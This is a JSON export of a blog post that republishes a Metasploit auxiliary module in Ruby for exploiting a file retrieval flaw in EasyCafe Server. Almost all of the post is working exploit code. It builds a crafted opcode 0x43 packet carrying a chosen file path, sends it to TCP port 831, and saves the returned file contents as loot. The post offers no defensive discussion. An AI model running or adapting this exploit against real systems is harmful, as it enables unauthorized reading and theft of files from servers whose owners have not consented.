{"id":59374,"date":"2024-09-01T22:39:56","date_gmt":"2024-09-01T19:39:56","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181215\/easycafe_server_fileaccess.rb.txt"},"modified":"2024-09-01T22:39:56","modified_gmt":"2024-09-01T19:39:56","slug":"easycafe-server-remote-file-access","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/easycafe-server-remote-file-access\/","title":{"rendered":"EasyCafe Server Remote File Access"},"content":{"rendered":"<p>##<br \/># This module requires Metasploit: https:\/\/metasploit.com\/download<br \/># Current source: https:\/\/github.com\/rapid7\/metasploit-framework<br \/>##<\/p>\n<p>class MetasploitModule &lt; Msf::Auxiliary<br \/>include Msf::Exploit::Remote::Tcp<br \/>include Msf::Auxiliary::Report<br \/>include Msf::Auxiliary::Scanner<\/p>\n<p>def initialize(info = {})<br \/>super(update_info(info,<br \/>&#8216;Name&#8217; =&gt; &#8216;EasyCafe Server Remote File Access&#8217;,<br \/>&#8216;Description&#8217; =&gt; %q{<br \/>This module exploits a file retrieval vulnerability in<br \/>EasyCafe Server. The vulnerability can be triggered by<br \/>sending a specially crafted packet (opcode 0x43) to the<br \/>831\/TCP port.<br \/>This module has been successfully tested on EasyCafe Server<br \/>version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3<br \/>and Windows 7 SP1.<br \/>Note that the server will throw a popup messagebox if the<br \/>specified file does not exist.<br \/>},<br \/>&#8216;License&#8217; =&gt; MSF_LICENSE,<br \/>&#8216;Author&#8217; =&gt;<br \/>[<br \/>&#8216;R-73eN&#8217;, # Vulnerability Discovery<br \/>&#8216;bcoles&#8217; # Metasploit module<br \/>],<br \/>&#8216;References&#8217; =&gt;<br \/>[<br \/>[ &#8216;EDB&#8217;, &#8216;39102&#8217; ]]))<\/p>\n<p>register_options(<br \/>[<br \/>Opt::RPORT(831),<br \/>OptString.new(&#8216;FILEPATH&#8217;, [true, &#8216;The path of the file to download&#8217;, &#8216;C:\\\\WINDOWS\\\\system32\\\\drivers\\\\etc\\\\hosts&#8217;])<br \/>])<br \/>end<\/p>\n<p>def get_file<br \/>res = sock.get_once<br \/>unless res<br \/>print_error(&#8220;Unable to retrieve file due to a timeout.&#8221;)<br \/>return<br \/>end<\/p>\n<p>unless res.length == 261<br \/>print_error(&#8220;Received a response of an invalid size.&#8221;)<br \/>return<br \/>end<\/p>\n<p>file_size = res.unpack(&#8216;@256V&#8217;)[0]contents = &#8221;<br \/>while contents.length &lt; file_size<br \/>contents &lt;&lt; sock.get_once<br \/>end<\/p>\n<p>print_good(&#8220;File retrieved successfully (#{contents.length} bytes)!&#8221;)<br \/>contents<br \/>end<\/p>\n<p>def run_host(ip)<br \/>file_path = datastore[&#8216;FILEPATH&#8217;]if file_path.length &gt; 67<br \/>print_error(&#8220;File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.&#8221;)<br \/>return<br \/>end<\/p>\n<p>packet = &#8220;\\x43&#8221;<br \/>packet &lt;&lt; file_path<br \/>packet &lt;&lt; &#8220;\\x00&#8221; * (255 &#8211; file_path.length)<br \/>packet &lt;&lt; &#8220;\\x01\\x00\\x00\\x00\\x01&#8221;<\/p>\n<p>vprint_status(&#8220;Sending request (#{packet.length} bytes)&#8221;)<br \/>connect<br \/>sock.put(packet)<\/p>\n<p>contents = get_file<br \/>disconnect<br \/>return if contents.nil?<\/p>\n<p>path = store_loot(<br \/>&#8216;easycafe_server&#8217;,<br \/>&#8216;application\/octet-stream&#8217;,<br \/>ip,<br \/>contents,<br \/>File.basename(file_path)<br \/>)<br \/>print_status(&#8220;File saved in: #{path}&#8221;)<br \/>end<br \/>end<\/p>\n","protected":false},"excerpt":{"rendered":"<p>### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule &lt; Msf::Auxiliaryinclude Msf::Exploit::Remote::Tcpinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Scanner def initialize(info = {})super(update_info(info,&#8216;Name&#8217; =&gt; &#8216;EasyCafe Server Remote File Access&#8217;,&#8216;Description&#8217; =&gt; %q{This module exploits a file retrieval vulnerability inEasyCafe Server. The vulnerability can be triggered bysending a specially crafted packet (opcode 0x43) to the831\/TCP port.This module has been successfully &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59374","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59374","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59374"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59374\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59374"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59374"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59374"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}